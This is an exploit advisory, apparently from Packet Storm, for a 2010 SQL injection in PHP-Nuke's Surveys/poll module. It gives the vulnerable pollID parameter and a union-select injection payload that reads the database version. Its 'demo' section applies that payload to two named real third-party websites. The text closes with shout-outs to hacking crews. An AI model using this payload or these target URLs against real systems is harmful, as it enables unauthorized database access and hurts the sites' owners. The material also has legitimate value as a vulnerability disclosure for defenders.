The survey and poll modules of PHP-Nuke CMS suffer from a remote SQL injection vulnerability.
4bd68725c894190cdf32ef82d91d676f9743dfc0c686d983012982fe37b8ace7
#############################################################################################################
## Tittle :PHPNUKE CMS ( Survey&poll ) SQLi Vulner ##
## Author : SENOT (selalungantuk_exe@yahoo.com) ##
## Homepage : https://www.indonesiancoder.com ##
## Date : Thursday 04 March, 2010 ##
## Location : - INDONESIA - ##
#############################################################################################################
[+] CMS INFO
[+] Name : PHPNUKE CMS
[+] Vendor : https://phpnuke.org/
[+] Download : https://phpnuke.org/modules.php?name=Downloads
[+] Vulnerability : SQL
[+] Dork : "Dork Just for newbie"
#############################################################################################################
[ Vulnerable File ]
[+] https://127.0.0.1/[senot]/modules.php?name=Surveys&op=results&pollID=[INDONESIANCODER]
[ XpL ]
[+] +and+1=2+union+select+1,version(),3,4--
[ DEMO ]
[+] https://prawo.uni.wroc.pl/modules.php?name=Surveys&op=results&pollID=5+and+1=2+union+select+1,version%28%29,3,4--
[+] https://wind.surfreport.it/default.php?go=modules.php%3Fname%3DSurveys%26op%3Dresults%26pollID%3D132+and+1=2+union+select+1,version%28%29,3,4--
#############################################################################################################
[ Thx TO ]
[+] INDONESIAN CODER - ServerIsDown - IndonesianHacker - SoldierOfAllah
[+] kaMtiEz,Tukulesto,M3NW5,arianom,gonzhack,tucker,saint
[+] B4YU5154,nuxdtyals,qu1ck_51lv3r,Mr.J0k3R,brandal_666
[+] elv1n4,Mr.fribo,Jack,VycOd,x-shadow,bobyhikaru,deril0101
[+] ex girlfriend ( you Are my Spirit )
[+] And you
[+] Get the codes and Feel the Soul ( INDONESIANCODER TEAM )
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed